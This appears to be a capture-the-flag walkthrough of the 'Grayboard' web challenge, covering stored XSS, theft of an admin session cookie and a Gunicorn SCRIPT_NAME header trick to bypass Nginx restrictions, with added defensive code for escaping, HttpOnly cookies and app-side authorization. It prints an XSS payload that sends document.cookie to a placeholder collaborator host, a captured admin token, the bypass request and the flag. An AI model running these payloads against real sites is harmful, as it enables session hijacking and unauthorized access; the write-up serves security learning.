CTF Walkthrough: Grayboard


Nehal Pillai

Category: Web | Points: 300

This challenge is part of the CTF organized by Amazon x WiCyS 2024. Let’s dive in and unravel the secrets of Grayboard!

Your mission: To finish that boring web design homework and absolutely not break anything in the process. Yeah, right.

1. The Setup:

First things first, register for an account. Your professor will appreciate the effort.

2. A Curious Endpoint:

After logging in, we’ll snoop around to see if anything interesting pops up in the code. While checking the source code like a detective with too much caffeine, you’ll spot an endpoint /internal.

“Oh, what’s this secret door?!” you wonder. But, of course, when you try to access it, the server goes all gatekeeper on you:

“403 Forbidden. Admins Only.”

Fine, fine. Let’s find a way to steal — I mean, borrow — admin cookies.

3. Hints Don’t Lie!!!

The challenge hint:

“Remember, you can submit assignments!”

Oh, the irony. Submitting a harmless homework assignment to destroy this very system? Game on.

4. Testing for XSS:

Let’s sprinkle in a little Cross-Site Scripting (XSS) magic. Submit the following payload:

<img src=x onerror=alert(`alchemistwashere`)>

After submission, view it.

Pop! A cute little alert box shows up, confirming the XSS. The server is officially our playground now :)

5. Exploiting XSS:

Time to get serious. We’ll craft a payload to snag admin cookies:

<script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
</script>

Replace BURP-COLLABORATOR-SUBDOMAIN with your Burp Collaborator link (a nifty feature of Burp Suite Pro).

Submit this payload, and voila! A hit appears in your Collaborator poll interface with the admin cookie :)

eyJpZCI6MSwidHlwZSI6ImFkbWluIiwidXNlcm5hbWUiOiJhZG1pbiJ9.ZzbmRA.O6NV1ZwjPcerI1T4FjDeayIihwg

Verify it using a JWT decoder like jwt.io.

The cookie checks out and belongs to the admin. 🎯
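Steps 4 and 5 work because the submission is echoed back as raw HTML and the session cookie is readable from script. The following is an added example, not code from the Grayboard challenge or its authors: a minimal stand-in for the assignment page that shows the unescaped render beside the escaped one, and a Set-Cookie builder that marks the session HttpOnly so document.cookie has nothing to hand over. The submission text is the walkthrough's own test payload; the cookie value is constructed.

```python
"""Added example (not the challenge's own code): the rendering defect behind the
stored XSS, the escaped render that defuses it, and an HttpOnly session cookie."""
from html import escape
from http.cookies import SimpleCookie

# Constructed sample submission: the walkthrough's own XSS test payload.
SUBMISSION = '<img src=x onerror=alert(`alchemistwashere`)>'


def render_submission_vulnerable(body: str) -> str:
    """Interpolates the submission verbatim into the page, so the browser
    parses the <img> tag and runs its onerror handler."""
    return f"<div class='submission'>{body}</div>"


def render_submission_fixed(body: str) -> str:
    """HTML-escapes the submission so it is displayed as text, not markup."""
    return f"<div class='submission'>{escape(body, quote=True)}</div>"


def contains_markup(rendered: str) -> bool:
    """Does a live <img ...> tag survive in the rendered page?"""
    return "<img" in rendered


def session_cookie_header(value: str, http_only: bool = True) -> str:
    """Builds the Set-Cookie value for the session (constructed stand-in, not
    Grayboard's real cookie). With HttpOnly set, document.cookie cannot read
    it, so a script injected into the page cannot exfiltrate it."""
    cookie = SimpleCookie()
    cookie["session"] = value
    cookie["session"]["httponly"] = http_only
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"
    return cookie.output(header="").strip()


def cookie_readable_by_script(set_cookie: str) -> bool:
    """Models what document.cookie exposes: a cookie set without the
    HttpOnly attribute is readable by page scripts."""
    return "httponly" not in set_cookie.lower()


if __name__ == "__main__":
    print(render_submission_vulnerable(SUBMISSION))
    print(render_submission_fixed(SUBMISSION))
    print(session_cookie_header("constructed-session-value"))
```

Escaping on output is what stops step 4 from firing at all; HttpOnly is the second layer that would have left step 5 with an empty POST body even if a script did run.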

6. Become the Admin:

Now, let’s flex our newfound admin power. Install the browser extension Cookie Editor (your new best friend) and replace your current cookie with the stolen admin cookie.

Boom! You’re the admin now.

Cue evil laughter

7. The Forbidden Fruit (/internal)

Let’s get to the /internal endpoint … which leads on to /internal/submissions, but…

403 Forbidden?!
“What do you mean I can’t enter after all this effort?!” Deep breaths. Let’s figure this out.

8. The Final Twist

After scouring the internet (and drowning in frustration), you notice something important:

The server is running Gunicorn, with Nginx as a reverse proxy. Google takes you to a fascinating Gunicorn issue.

Gunicorn can be tricked via HTTP headers like SCRIPT_NAME into bypassing Nginx’s access controls. Let’s exploit this misconfiguration.

9. Crafting the Request

Using a tool like Burp Suite, modify your HTTP request to include:

GET /test/internal/internal/submissions

Header:
Script_name: /internal

Here’s what’s happening:
When the SCRIPT_NAME header is set to /internal, Gunicorn treats the path as starting from /internal: it cuts the SCRIPT_NAME value out of the request path and routes on what remains. So /test/internal/internal/submissions is handled inside the app as /internal/submissions, while Nginx only ever saw a request for /test/…, so its 403 rule for /internal never fired and the restricted endpoint is reached.
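The lesson from step 9 is that a path rule at the proxy is not the same as the path the application routes on. As an added example (not the challenge's own code), here is a small WSGI middleware that enforces the admin check on SCRIPT_NAME + PATH_INFO, the path the app actually serves, so a prefix that arrives via SCRIPT_NAME still lands inside the protected tree. The environ values are constructed to model what the walkthrough describes (the application seeing SCRIPT_NAME='/internal' and PATH_INFO='/submissions'); the cookie-to-role lookup is a stand-in and is not Grayboard's real session format.

```python
"""Added example (not the challenge's own code): app-side authorization on the
routed path, so the proxy's 403 rule is not the only gate on /internal."""
from typing import Callable

# Constructed stand-in for a session store: cookie value -> role.
SESSIONS = {"student-session": "student", "admin-session": "admin"}


def role_from_environ(environ: dict) -> str:
    """Looks the session cookie up in the stand-in store; 'anonymous' if absent."""
    for part in environ.get("HTTP_COOKIE", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "session":
            return SESSIONS.get(value, "anonymous")
    return "anonymous"


def full_request_path(environ: dict) -> str:
    """The path the application routes on: SCRIPT_NAME + PATH_INFO. Checking
    this, rather than the request line the proxy matched, means a prefix that
    was moved into SCRIPT_NAME is still covered by the rule."""
    return environ.get("SCRIPT_NAME", "") + environ.get("PATH_INFO", "")


def require_admin(app: Callable, protected_prefix: str = "/internal") -> Callable:
    """WSGI middleware: anything under protected_prefix needs the admin role."""
    def wrapped(environ, start_response):
        if (full_request_path(environ).startswith(protected_prefix)
                and role_from_environ(environ) != "admin"):
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"403 Forbidden. Admins Only."]
        return app(environ, start_response)
    return wrapped


def grayboard_like_app(environ, start_response):
    """Minimal stand-in application that just echoes the routed path."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [f"served {full_request_path(environ)}".encode()]


def make_environ(script_name: str, path_info: str, cookie: str = "") -> dict:
    """Constructed environ modelling what the app sees after Gunicorn has
    applied a SCRIPT_NAME of script_name (assumption based on the walkthrough)."""
    return {
        "REQUEST_METHOD": "GET",
        "SCRIPT_NAME": script_name,
        "PATH_INFO": path_info,
        "HTTP_COOKIE": cookie,
    }


def run(app: Callable, environ: dict):
    """Calls a WSGI app directly and returns (status, body) for inspection."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status

    body = b"".join(app(environ, start_response))
    return captured["status"], body.decode()


APP = require_admin(grayboard_like_app)

if __name__ == "__main__":
    print(run(APP, make_environ("/internal", "/submissions")))
    print(run(APP, make_environ("/internal", "/submissions", "session=admin-session")))
```

Two further controls belong alongside this, both my notes rather than something the walkthrough states: have Nginx clear the header before proxying (an empty value in proxy_set_header means the header is not passed on), and keep Gunicorn current so the server does not honour a client-supplied SCRIPT_NAME in the first place.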

The stars align, and the server finally coughs up the flag:

Flag{why_yes_i_am_valedictorian_but_dont_ask_how}

Turns out, even web design homework has a dark side. Who knew? 😉

Special thanks to the organizers, Amazon and WiCyS, for creating such an enjoyable and thought-provoking challenge!

And if you’ve stuck with me all the way to the end — thank you so much for reading!😄 I’d love to hear your feedback on this, so don’t hesitate to connect with me on LinkedIn (Nehal Pillai) and Twitter (@nehal_10_0) — Let’s keep the cybersecurity convo going!

Cheers 🍻 and until next time….
